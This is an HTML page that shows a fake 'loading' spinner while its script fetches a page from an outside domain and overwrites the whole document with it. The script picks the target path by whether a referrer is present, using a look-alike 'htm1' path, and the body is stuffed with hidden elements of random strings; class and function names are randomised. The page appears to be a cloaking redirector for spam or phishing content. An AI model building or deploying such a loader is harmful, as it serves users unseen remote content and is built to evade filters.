<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .tnHddYAX {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .tnHddYAX .sVn8Xy8qrJ {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .tnHddYAX .content {
            line-height: 50px;
            text-align: center
        }

        .tnHddYAX .img {
            width: 100%
        }

        .tnHddYAX .xtksQz {
            text-align: center
        }

        .tnHddYAX .xtksQz span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .tnHddYAX .xtksQz span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .tnHddYAX .xtksQz span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .tnHddYAX .xtksQz span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .tnHddYAX .xtksQz span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .tnHddYAX .xtksQz span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .tnHddYAX .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function kbLKrt1bI(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var PgBB67 = kbLKrt1bI('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ PgBB67 +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ PgBB67 +".html?a=share";
		}
		
        wSPgnMKj=url+"#"+new Date().getTime();
        wSPgnMKj && function() {
            $.get(wSPgnMKj, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<b style='display:none' >ZND2Qt1UoeqbvzcjbgjF</b>
<h1 style='display:none' >lst3Xb8DhmC7b2NtwhyN1l0mkmOFj0MZEab0UTNsWygUAMMSp71LWVsyyxNrYh8u</h1>
<b style='display:none' >ZND2Qt1UoeqbvzcjbgjF</b>
<div style='display:none'>cv33qIaw171QouOXzp3KlocQYx40QFLwdRrWA6sgmXdIDJvcN</div>
<img  src='' style='display:none'>
<ul style='display:none' >yMxPAqqkDDgLVX0SrXwbmbgangpn5NoH4jpIhLxp53gCV</ul>
<img  src='' style='display:none'>
<a  href='#' style='display:none'>ZRexIrfW6tTNV0sPDWVrMzBM2ygeDCIavuzefHrd0vMGbDAP3e6urs4Zb8reHyFBwvPK21udJW6aPAaDGwkBasJfzfK2fWPt9OH</a><div class="tnHddYAX">
    <div class="sVn8Xy8qrJ">
        <div class="xtksQz">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<a  href='#' style='display:none'>fniX3qmajYYnb</a>
<p  style='display:none'>lEhplnZG6f2M2l7VsyTAZH6hoqhPEtfGHg3Wo4JOYOoftM24MdTjKdOluxYobhzZ9e4lQ</p>
<li style='display:none' >ypg9ZuPOtbKv6vOl59Dt6gliOMmccZ41xiha80xWfnwPbXhrFdFuUBzch4ODBf7SFw6ENOdNzGJfqzcROU0r</li>
<b style='display:none' >BtI23zDYqLbn8tmXuPxrJYoDGLWGMsULjrJx8eMsU4mXiXTxe5xYqyfv1cyqe2f4W3IlTsdHz9nciKgU3P9hXilvV8D3T</b>
<ul style='display:none' >dCSF4nVPsAV3jRcJQIkQieVgaCWnxjcnJmF4p3GBcvjI4C9qmMvKaZvDch8QY4HbLBb5aPO</ul>
<div style='display:none'>dbJeH0jPG3BGbZPuGmurOP45Dfdaif30Xne5o824VfOJ1ncpxaj24ChgiWGsAieN6TNWmwSAMDkNQ2TQ</div>
<img  src='' style='display:none'></body>
</html>